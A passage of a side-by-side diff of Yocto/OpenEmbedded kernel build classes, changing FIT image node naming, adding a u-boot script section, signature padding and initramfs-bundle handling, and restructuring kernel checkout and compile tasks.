197 hash@1 { 246 hash-1 {
198 algo = "${setup_csum}"; 247 algo = "${setup_csum}";
199 }; 248 };
200 }; 249 };
@@ -221,7 +270,7 @@ fitimage_emit_section_ramdisk() {
221 fi 270 fi
222 271
223 cat << EOF >> ${1} 272 cat << EOF >> ${1}
224 ramdisk@${2} { 273 ramdisk-${2} {
225 description = "${INITRAMFS_IMAGE}"; 274 description = "${INITRAMFS_IMAGE}";
226 data = /incbin/("${3}"); 275 data = /incbin/("${3}");
227 type = "ramdisk"; 276 type = "ramdisk";
@@ -230,7 +279,7 @@ fitimage_emit_section_ramdisk() {
230 compression = "none"; 279 compression = "none";
231 ${ramdisk_loadline} 280 ${ramdisk_loadline}
232 ${ramdisk_entryline} 281 ${ramdisk_entryline}
233 hash@1 { 282 hash-1 {
234 algo = "${ramdisk_csum}"; 283 algo = "${ramdisk_csum}";
235 }; 284 };
236 }; 285 };
@@ -244,13 +293,15 @@ EOF
244# $2 ... Linux kernel ID 293# $2 ... Linux kernel ID
245# $3 ... DTB image name 294# $3 ... DTB image name
246# $4 ... ramdisk ID 295# $4 ... ramdisk ID
247# $5 ... config ID 296# $5 ... u-boot script ID
248# $6 ... default flag 297# $6 ... config ID
298# $7 ... default flag
249fitimage_emit_section_config() { 299fitimage_emit_section_config() {
250 300
251 conf_csum="${FIT_HASH_ALG}" 301 conf_csum="${FIT_HASH_ALG}"
252 conf_sign_algo="${FIT_SIGN_ALG}" 302 conf_sign_algo="${FIT_SIGN_ALG}"
253 if [ -n "${UBOOT_SIGN_ENABLE}" ] ; then 303 conf_padding_algo="${FIT_PAD_ALG}"
304 if [ "${UBOOT_SIGN_ENABLE}" = "1" ] ; then
254 conf_sign_keyname="${UBOOT_SIGN_KEYNAME}" 305 conf_sign_keyname="${UBOOT_SIGN_KEYNAME}"
255 fi 306 fi
256 307
@@ -260,45 +311,53 @@ fitimage_emit_section_config() {
260 kernel_line="" 311 kernel_line=""
261 fdt_line="" 312 fdt_line=""
262 ramdisk_line="" 313 ramdisk_line=""
314 bootscr_line=""
263 setup_line="" 315 setup_line=""
264 default_line="" 316 default_line=""
265 317
266 if [ -n "${2}" ]; then 318 if [ -n "${2}" ]; then
267 conf_desc="Linux kernel" 319 conf_desc="Linux kernel"
268 sep=", " 320 sep=", "
269 kernel_line="kernel = \"kernel@${2}\";" 321 kernel_line="kernel = \"kernel-${2}\";"
270 fi 322 fi
271 323
272 if [ -n "${3}" ]; then 324 if [ -n "${3}" ]; then
273 conf_desc="${conf_desc}${sep}FDT blob" 325 conf_desc="${conf_desc}${sep}FDT blob"
274 sep=", " 326 sep=", "
275 fdt_line="fdt = \"fdt@${3}\";" 327 fdt_line="fdt = \"fdt-${3}\";"
276 fi 328 fi
277 329
278 if [ -n "${4}" ]; then 330 if [ -n "${4}" ]; then
279 conf_desc="${conf_desc}${sep}ramdisk" 331 conf_desc="${conf_desc}${sep}ramdisk"
280 sep=", " 332 sep=", "
281 ramdisk_line="ramdisk = \"ramdisk@${4}\";" 333 ramdisk_line="ramdisk = \"ramdisk-${4}\";"
282 fi 334 fi
283 335
284 if [ -n "${5}" ]; then 336 if [ -n "${5}" ]; then
337 conf_desc="${conf_desc}${sep}u-boot script"
338 sep=", "
339 bootscr_line="bootscr = \"bootscr-${5}\";"
340 fi
341
342 if [ -n "${6}" ]; then
285 conf_desc="${conf_desc}${sep}setup" 343 conf_desc="${conf_desc}${sep}setup"
286 setup_line="setup = \"setup@${5}\";" 344 setup_line="setup = \"setup-${6}\";"
287 fi 345 fi
288 346
289 if [ "${6}" = "1" ]; then 347 if [ "${7}" = "1" ]; then
290 default_line="default = \"conf@${3}\";" 348 default_line="default = \"conf-${3}\";"
291 fi 349 fi
292 350
293 cat << EOF >> ${1} 351 cat << EOF >> ${1}
294 ${default_line} 352 ${default_line}
295 conf@${3} { 353 conf-${3} {
296 description = "${6} ${conf_desc}"; 354 description = "${7} ${conf_desc}";
297 ${kernel_line} 355 ${kernel_line}
298 ${fdt_line} 356 ${fdt_line}
299 ${ramdisk_line} 357 ${ramdisk_line}
358 ${bootscr_line}
300 ${setup_line} 359 ${setup_line}
301 hash@1 { 360 hash-1 {
302 algo = "${conf_csum}"; 361 algo = "${conf_csum}";
303 }; 362 };
304EOF 363EOF
@@ -324,15 +383,21 @@ EOF
324 fi 383 fi
325 384
326 if [ -n "${5}" ]; then 385 if [ -n "${5}" ]; then
386 sign_line="${sign_line}${sep}\"bootscr\""
387 sep=", "
388 fi
389
390 if [ -n "${6}" ]; then
327 sign_line="${sign_line}${sep}\"setup\"" 391 sign_line="${sign_line}${sep}\"setup\""
328 fi 392 fi
329 393
330 sign_line="${sign_line};" 394 sign_line="${sign_line};"
331 395
332 cat << EOF >> ${1} 396 cat << EOF >> ${1}
333 signature@1 { 397 signature-1 {
334 algo = "${conf_csum},${conf_sign_algo}"; 398 algo = "${conf_csum},${conf_sign_algo}";
335 key-name-hint = "${conf_sign_keyname}"; 399 key-name-hint = "${conf_sign_keyname}";
400 padding = "${conf_padding_algo}";
336 ${sign_line} 401 ${sign_line}
337 }; 402 };
338EOF 403EOF
@@ -355,6 +420,7 @@ fitimage_assemble() {
355 DTBS="" 420 DTBS=""
356 ramdiskcount=${3} 421 ramdiskcount=${3}
357 setupcount="" 422 setupcount=""
423 bootscr_id=""
358 rm -f ${1} arch/${ARCH}/boot/${2} 424 rm -f ${1} arch/${ARCH}/boot/${2}
359 425
360 fitimage_emit_fit_header ${1} 426 fitimage_emit_fit_header ${1}
@@ -365,7 +431,7 @@ fitimage_assemble() {
365 fitimage_emit_section_maint ${1} imagestart 431 fitimage_emit_section_maint ${1} imagestart
366 432
367 uboot_prep_kimage 433 uboot_prep_kimage
368 fitimage_emit_section_kernel ${1} "${kernelcount}" linux.bin "${linux_comp}" 434 fitimage_emit_section_kernel $1 $kernelcount linux.bin "$linux_comp"
369 435
370 # 436 #
371 # Step 2: Prepare a DTB image section 437 # Step 2: Prepare a DTB image section
@@ -399,7 +465,21 @@ fitimage_assemble() {
399 fi 465 fi
400 466
401 # 467 #
402 # Step 3: Prepare a setup section. (For x86) 468 # Step 3: Prepare a u-boot script section
469 #
470
471 if [ -n "${UBOOT_ENV}" ] && [ -d "${STAGING_DIR_HOST}/boot" ]; then
472 if [ -e "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY}" ]; then
473 cp ${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} ${B}
474 bootscr_id="${UBOOT_ENV_BINARY}"
475 fitimage_emit_section_boot_script ${1} "${bootscr_id}" ${UBOOT_ENV_BINARY}
476 else
477 bbwarn "${STAGING_DIR_HOST}/boot/${UBOOT_ENV_BINARY} not found."
478 fi
479 fi
480
481 #
482 # Step 4: Prepare a setup section. (For x86)
403 # 483 #
404 if [ -e arch/${ARCH}/boot/setup.bin ]; then 484 if [ -e arch/${ARCH}/boot/setup.bin ]; then
405 setupcount=1 485 setupcount=1
@@ -407,9 +487,9 @@ fitimage_assemble() {
407 fi 487 fi
408 488
409 # 489 #
410 # Step 4: Prepare a ramdisk section. 490 # Step 5: Prepare a ramdisk section.
411 # 491 #
412 if [ "x${ramdiskcount}" = "x1" ] ; then 492 if [ "x${ramdiskcount}" = "x1" ] && [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
413 # Find and use the first initramfs image archive type we find 493 # Find and use the first initramfs image archive type we find
414 for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do 494 for img in cpio.lz4 cpio.lzo cpio.lzma cpio.xz cpio.gz ext2.gz cpio; do
415 initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}" 495 initramfs_path="${DEPLOY_DIR_IMAGE}/${INITRAMFS_IMAGE_NAME}.${img}"
@@ -430,7 +510,7 @@ fitimage_assemble() {
430 fi 510 fi
431 511
432 # 512 #
433 # Step 5: Prepare a configurations section 513 # Step 6: Prepare a configurations section
434 # 514 #
435 fitimage_emit_section_maint ${1} confstart 515 fitimage_emit_section_maint ${1} confstart
436 516
@@ -439,9 +519,9 @@ fitimage_assemble() {
439 for DTB in ${DTBS}; do 519 for DTB in ${DTBS}; do
440 dtb_ext=${DTB##*.} 520 dtb_ext=${DTB##*.}
441 if [ "${dtb_ext}" = "dtbo" ]; then 521 if [ "${dtb_ext}" = "dtbo" ]; then
442 fitimage_emit_section_config ${1} "" "${DTB}" "" "" "`expr ${i} = ${dtbcount}`" 522 fitimage_emit_section_config ${1} "" "${DTB}" "" "${bootscr_id}" "" "`expr ${i} = ${dtbcount}`"
443 else 523 else
444 fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${setupcount}" "`expr ${i} = ${dtbcount}`" 524 fitimage_emit_section_config ${1} "${kernelcount}" "${DTB}" "${ramdiskcount}" "${bootscr_id}" "${setupcount}" "`expr ${i} = ${dtbcount}`"
445 fi 525 fi
446 i=`expr ${i} + 1` 526 i=`expr ${i} + 1`
447 done 527 done
@@ -452,7 +532,7 @@ fitimage_assemble() {
452 fitimage_emit_section_maint ${1} fitend 532 fitimage_emit_section_maint ${1} fitend
453 533
454 # 534 #
455 # Step 6: Assemble the image 535 # Step 7: Assemble the image
456 # 536 #
457 uboot-mkimage \ 537 uboot-mkimage \
458 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \ 538 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
@@ -460,7 +540,7 @@ fitimage_assemble() {
460 arch/${ARCH}/boot/${2} 540 arch/${ARCH}/boot/${2}
461 541
462 # 542 #
463 # Step 7: Sign the image and add public key to U-Boot dtb 543 # Step 8: Sign the image and add public key to U-Boot dtb
464 # 544 #
465 if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then 545 if [ "x${UBOOT_SIGN_ENABLE}" = "x1" ] ; then
466 add_key_to_u_boot="" 546 add_key_to_u_boot=""
@@ -474,7 +554,8 @@ fitimage_assemble() {
474 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \ 554 ${@'-D "${UBOOT_MKIMAGE_DTCOPTS}"' if len('${UBOOT_MKIMAGE_DTCOPTS}') else ''} \
475 -F -k "${UBOOT_SIGN_KEYDIR}" \ 555 -F -k "${UBOOT_SIGN_KEYDIR}" \
476 $add_key_to_u_boot \ 556 $add_key_to_u_boot \
477 -r arch/${ARCH}/boot/${2} 557 -r arch/${ARCH}/boot/${2} \
558 ${UBOOT_MKIMAGE_SIGN_ARGS}
478 fi 559 fi
479} 560}
480 561
@@ -491,7 +572,11 @@ do_assemble_fitimage_initramfs() {
491 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \ 572 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage" && \
492 test -n "${INITRAMFS_IMAGE}" ; then 573 test -n "${INITRAMFS_IMAGE}" ; then
493 cd ${B} 574 cd ${B}
494 fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1 575 if [ "${INITRAMFS_IMAGE_BUNDLE}" = "1" ]; then
576 fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage ""
577 else
578 fitimage_assemble fit-image-${INITRAMFS_IMAGE}.its fitImage-${INITRAMFS_IMAGE} 1
579 fi
495 fi 580 fi
496} 581}
497 582
@@ -502,22 +587,32 @@ kernel_do_deploy[vardepsexclude] = "DATETIME"
502kernel_do_deploy_append() { 587kernel_do_deploy_append() {
503 # Update deploy directory 588 # Update deploy directory
504 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then 589 if echo ${KERNEL_IMAGETYPES} | grep -wq "fitImage"; then
505 echo "Copying fit-image.its source file..." 590 if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
506 install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its" 591 echo "Copying fit-image.its source file..."
507 ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}" 592 install -m 0644 ${B}/fit-image.its "$deployDir/fitImage-its-${KERNEL_FIT_NAME}.its"
593 if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
594 ln -snf fitImage-its-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${KERNEL_FIT_LINK_NAME}"
595 fi
508 596
509 echo "Copying linux.bin file..." 597 echo "Copying linux.bin file..."
510 install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin 598 install -m 0644 ${B}/linux.bin $deployDir/fitImage-linux.bin-${KERNEL_FIT_NAME}.bin
511 ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}" 599 if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
600 ln -snf fitImage-linux.bin-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-linux.bin-${KERNEL_FIT_LINK_NAME}"
601 fi
602 fi
512 603
513 if [ -n "${INITRAMFS_IMAGE}" ]; then 604 if [ -n "${INITRAMFS_IMAGE}" ]; then
514 echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..." 605 echo "Copying fit-image-${INITRAMFS_IMAGE}.its source file..."
515 install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its" 606 install -m 0644 ${B}/fit-image-${INITRAMFS_IMAGE}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its"
516 ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}" 607 ln -snf fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.its "$deployDir/fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
517 608
518 echo "Copying fitImage-${INITRAMFS_IMAGE} file..." 609 if [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ]; then
519 install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin" 610 echo "Copying fitImage-${INITRAMFS_IMAGE} file..."
520 ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}" 611 install -m 0644 ${B}/arch/${ARCH}/boot/fitImage-${INITRAMFS_IMAGE} "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin"
612 if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then
613 ln -snf fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_NAME}.bin "$deployDir/fitImage-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}"
614 fi
615 fi
521 fi 616 fi
522 if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then 617 if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then
523 # UBOOT_DTB_IMAGE is a realfile, but we can't use 618 # UBOOT_DTB_IMAGE is a realfile, but we can't use
@@ -527,3 +622,13 @@ kernel_do_deploy_append() {
527 fi 622 fi
528 fi 623 fi
529} 624}
625
626# The function below performs the following in case of initramfs bundles:
627# - Removes do_assemble_fitimage. FIT generation is done through
628# do_assemble_fitimage_initramfs. do_assemble_fitimage is not needed
629# and should not be part of the tasks to be executed.
630python () {
631 d.appendVarFlag('do_compile', 'vardeps', ' INITRAMFS_IMAGE_BUNDLE')
632 if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
633 bb.build.deltask('do_assemble_fitimage', d)
634}
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index ec5fb7b1de..2abbc2ff66 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -105,6 +105,8 @@ do_kernel_metadata() {
105 cd ${S} 105 cd ${S}
106 export KMETA=${KMETA} 106 export KMETA=${KMETA}
107 107
108 bbnote "do_kernel_metadata: for summary/debug, set KCONF_AUDIT_LEVEL > 0"
109
108 # if kernel tools are available in-tree, they are preferred 110 # if kernel tools are available in-tree, they are preferred
109 # and are placed on the path before any external tools. Unless 111 # and are placed on the path before any external tools. Unless
110 # the external tools flag is set, in that case we do nothing. 112 # the external tools flag is set, in that case we do nothing.
@@ -192,7 +194,7 @@ do_kernel_metadata() {
192 # SRC_URI. If they were supplied, we convert them into include directives 194 # SRC_URI. If they were supplied, we convert them into include directives
193 # for the update part of the process 195 # for the update part of the process
194 for f in ${feat_dirs}; do 196 for f in ${feat_dirs}; do
195 if [ -d "${WORKDIR}/$f/meta" ]; then 197 if [ -d "${WORKDIR}/$f/kernel-meta" ]; then
196 includes="$includes -I${WORKDIR}/$f/kernel-meta" 198 includes="$includes -I${WORKDIR}/$f/kernel-meta"
197 elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then 199 elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then
198 includes="$includes -I${WORKDIR}/../oe-local-files/$f" 200 includes="$includes -I${WORKDIR}/../oe-local-files/$f"
@@ -252,6 +254,23 @@ do_kernel_metadata() {
252 bbfatal_log "Could not generate configuration queue for ${KMACHINE}." 254 bbfatal_log "Could not generate configuration queue for ${KMACHINE}."
253 fi 255 fi
254 fi 256 fi
257
258 if [ ${KCONF_AUDIT_LEVEL} -gt 0 ]; then
259 bbnote "kernel meta data summary for ${KMACHINE} (${LINUX_KERNEL_TYPE}):"
260 bbnote "======================================================================"
261 if [ -n "${KMETA_EXTERNAL_BSPS}" ]; then
262 bbnote "Non kernel-cache (external) bsp"
263 fi
264 bbnote "BSP entry point / definition: $bsp_definition"
265 if [ -n "$in_tree_defconfig" ]; then
266 bbnote "KBUILD_DEFCONFIG: ${KBUILD_DEFCONFIG}"
267 fi
268 bbnote "Fragments from SRC_URI: $sccs_from_src_uri"
269 bbnote "KERNEL_FEATURES: $KERNEL_FEATURES_FINAL"
270 bbnote "Final scc/cfg list: $sccs_defconfig $bsp_definition $sccs $KERNEL_FEATURES_FINAL"
271 fi
272
273 set -e
255} 274}
256 275
257do_patch() { 276do_patch() {
@@ -281,6 +300,8 @@ do_patch() {
281 fi 300 fi
282 done 301 done
283 fi 302 fi
303
304 set -e
284} 305}
285 306
286do_kernel_checkout() { 307do_kernel_checkout() {
@@ -303,6 +324,21 @@ do_kernel_checkout() {
303 fi 324 fi
304 fi 325 fi
305 cd ${S} 326 cd ${S}
327
328 # convert any remote branches to local tracking ones
329 for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
330 b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
331 git show-ref --quiet --verify -- "refs/heads/$b"
332 if [ $? -ne 0 ]; then
333 git branch $b $i > /dev/null
334 fi
335 done
336
337 # Create a working tree copy of the kernel by checking out a branch
338 machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
339
340 # checkout and clobber any unimportant files
341 git checkout -f ${machine_branch}
306 else 342 else
307 # case: we have no git repository at all. 343 # case: we have no git repository at all.
308 # To support low bandwidth options for building the kernel, we'll just 344 # To support low bandwidth options for building the kernel, we'll just
@@ -325,20 +361,7 @@ do_kernel_checkout() {
325 git clean -d -f 361 git clean -d -f
326 fi 362 fi
327 363
328 # convert any remote branches to local tracking ones 364 set -e
329 for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
330 b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
331 git show-ref --quiet --verify -- "refs/heads/$b"
332 if [ $? -ne 0 ]; then
333 git branch $b $i > /dev/null
334 fi
335 done
336
337 # Create a working tree copy of the kernel by checking out a branch
338 machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
339
340 # checkout and clobber any unimportant files
341 git checkout -f ${machine_branch}
342} 365}
343do_kernel_checkout[dirs] = "${S}" 366do_kernel_checkout[dirs] = "${S}"
344 367
@@ -506,6 +529,8 @@ do_validate_branches() {
506 kgit-s2q --clean 529 kgit-s2q --clean
507 fi 530 fi
508 fi 531 fi
532
533 set -e
509} 534}
510 535
511OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT" 536OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT"
diff --git a/meta/classes/kernel.bbclass b/meta/classes/kernel.bbclass
index 83a574efcd..ca7530095e 100644
--- a/meta/classes/kernel.bbclass
+++ b/meta/classes/kernel.bbclass
@@ -75,7 +75,7 @@ python __anonymous () {
75 # KERNEL_IMAGETYPES may contain a mixture of image types supported directly 75 # KERNEL_IMAGETYPES may contain a mixture of image types supported directly
76 # by the kernel build system and types which are created by post-processing 76 # by the kernel build system and types which are created by post-processing
77 # the output of the kernel build system (e.g. compressing vmlinux -> 77 # the output of the kernel build system (e.g. compressing vmlinux ->
78 # vmlinux.gz in kernel_do_compile()). 78 # vmlinux.gz in kernel_do_transform_kernel()).
79 # KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported 79 # KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported
80 # directly by the kernel build system. 80 # directly by the kernel build system.
81 if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'): 81 if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'):
@@ -91,6 +91,8 @@ python __anonymous () {
91 imagedest = d.getVar('KERNEL_IMAGEDEST') 91 imagedest = d.getVar('KERNEL_IMAGEDEST')
92 92
93 for type in types.split(): 93 for type in types.split():
94 if bb.data.inherits_class('nopackages', d):
95 continue
94 typelower = type.lower() 96 typelower = type.lower()
95 d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower)) 97 d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
96 d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type) 98 d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type)
@@ -104,6 +106,8 @@ python __anonymous () {
104 # standalone for use by wic and other tools. 106 # standalone for use by wic and other tools.
105 if image: 107 if image:
106 d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete') 108 d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete')
109 if image and bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE')):
110 bb.build.addtask('do_transform_bundled_initramfs', 'do_deploy', 'do_bundle_initramfs', d)
107 111
108 # NOTE: setting INITRAMFS_TASK is for backward compatibility 112 # NOTE: setting INITRAMFS_TASK is for backward compatibility
109 # The preferred method is to set INITRAMFS_IMAGE, because 113 # The preferred method is to set INITRAMFS_IMAGE, because
@@ -139,13 +143,14 @@ do_unpack[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILD
139do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}" 143do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}"
140python do_symlink_kernsrc () { 144python do_symlink_kernsrc () {
141 s = d.getVar("S") 145 s = d.getVar("S")
142 if s[-1] == '/':
143 # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as directory name and fail
144 s=s[:-1]
145 kernsrc = d.getVar("STAGING_KERNEL_DIR") 146 kernsrc = d.getVar("STAGING_KERNEL_DIR")
146 if s != kernsrc: 147 if s != kernsrc:
147 bb.utils.mkdirhier(kernsrc) 148 bb.utils.mkdirhier(kernsrc)
148 bb.utils.remove(kernsrc, recurse=True) 149 bb.utils.remove(kernsrc, recurse=True)
150 if s[-1] == '/':
151 # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as
152 # directory name and fail
153 s = s[:-1]
149 if d.getVar("EXTERNALSRC"): 154 if d.getVar("EXTERNALSRC"):
150 # With EXTERNALSRC S will not be wiped so we can symlink to it 155 # With EXTERNALSRC S will not be wiped so we can symlink to it
151 os.symlink(s, kernsrc) 156 os.symlink(s, kernsrc)
@@ -194,6 +199,8 @@ UBOOT_LOADADDRESS ?= "${UBOOT_ENTRYPOINT}"
194KERNEL_EXTRA_ARGS ?= "" 199KERNEL_EXTRA_ARGS ?= ""
195 200
196EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}"" 201EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
202EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}""
203
197KERNEL_ALT_IMAGETYPE ??= "" 204KERNEL_ALT_IMAGETYPE ??= ""
198 205
199copy_initramfs() { 206copy_initramfs() {
@@ -276,6 +283,14 @@ do_bundle_initramfs () {
276} 283}
277do_bundle_initramfs[dirs] = "${B}" 284do_bundle_initramfs[dirs] = "${B}"
278 285
286kernel_do_transform_bundled_initramfs() {
287 # vmlinux.gz is not built by kernel
288 if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
289 gzip -9cn < ${KERNEL_OUTPUT_DIR}/vmlinux.initramfs > ${KERNEL_OUTPUT_DIR}/vmlinux.gz.initramfs
290 fi
291}
292do_transform_bundled_initramfs[dirs] = "${B}"
293
279python do_devshell_prepend () { 294python do_devshell_prepend () {
280 os.environ["LDFLAGS"] = '' 295 os.environ["LDFLAGS"] = ''
281} 296}
@@ -307,6 +322,10 @@ kernel_do_compile() {
307 export KBUILD_BUILD_TIMESTAMP="$ts" 322 export KBUILD_BUILD_TIMESTAMP="$ts"
308 export KCONFIG_NOTIMESTAMP=1 323 export KCONFIG_NOTIMESTAMP=1
309 bbnote "KBUILD_BUILD_TIMESTAMP: $ts" 324 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
325 else
326 ts=`LC_ALL=C date`
327 export KBUILD_BUILD_TIMESTAMP="$ts"
328 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
310 fi 329 fi
311 # The $use_alternate_initrd is only set from 330 # The $use_alternate_initrd is only set from
312 # do_bundle_initramfs() This variable is specifically for the 331 # do_bundle_initramfs() This variable is specifically for the
@@ -325,12 +344,17 @@ kernel_do_compile() {
325 for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do 344 for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do
326 oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd 345 oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd
327 done 346 done
347}
348
349kernel_do_transform_kernel() {
328 # vmlinux.gz is not built by kernel 350 # vmlinux.gz is not built by kernel
329 if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then 351 if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
330 mkdir -p "${KERNEL_OUTPUT_DIR}" 352 mkdir -p "${KERNEL_OUTPUT_DIR}"
331 gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz" 353 gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz"
332 fi 354 fi
333} 355}
356do_transform_kernel[dirs] = "${B}"
357addtask transform_kernel after do_compile before do_install
334 358
335do_compile_kernelmodules() { 359do_compile_kernelmodules() {
336 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE 360 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
@@ -348,6 +372,10 @@ do_compile_kernelmodules() {
348 export KBUILD_BUILD_TIMESTAMP="$ts" 372 export KBUILD_BUILD_TIMESTAMP="$ts"
349 export KCONFIG_NOTIMESTAMP=1 373 export KCONFIG_NOTIMESTAMP=1
350 bbnote "KBUILD_BUILD_TIMESTAMP: $ts" 374 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
375 else
376 ts=`LC_ALL=C date`
377 export KBUILD_BUILD_TIMESTAMP="$ts"
378 bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
351 fi 379 fi
352 if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then 380 if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then
353 cc_extra=$(get_cc_option) 381 cc_extra=$(get_cc_option)
@@ -377,8 +405,8 @@ kernel_do_install() {
377 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE 405 unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
378 if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then 406 if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then
